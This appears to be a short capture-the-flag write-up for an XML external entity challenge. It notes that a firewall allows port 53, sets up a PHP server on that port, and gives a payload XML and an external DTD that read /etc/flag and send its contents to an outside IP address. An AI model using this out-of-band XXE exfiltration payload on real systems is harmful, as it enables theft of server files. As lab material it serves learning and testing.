Rating: 5.0
In the rules iptabes.sh is written.
## This should be one of the first rules.
## so dns lookups are already allowed for your other rules
$ IPT -A OUTPUT -p udp --dport 53 -m state --state NEW, ESTABLISHED -j ACCEPT
$ IPT -A INPUT -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
$ IPT -A OUTPUT -p tcp --dport 53 -m state --state NEW, ESTABLISHED -j ACCEPT
$ IPT -A INPUT -p tcp --sport 53 -m state --state ESTABLISHED -j ACCEPT
Input and output on port 53 is enabled, we can approve of this rule.
In the challenge page we will send the payload.
On the server let's open an http server on port 53.
start_server.sh
echo $(curl -s ifconfig.me/ip)
systemctl stop systemd-resolved
php -S 0.0.0.0:53
payload.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://51.158.67.1:53/file.dtd">
<data>&send;</data>
file.dtd
<!ENTITY % file SYSTEM "file:///etc/flag">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://51.158.67.1:53/?%file;'>">
%all;
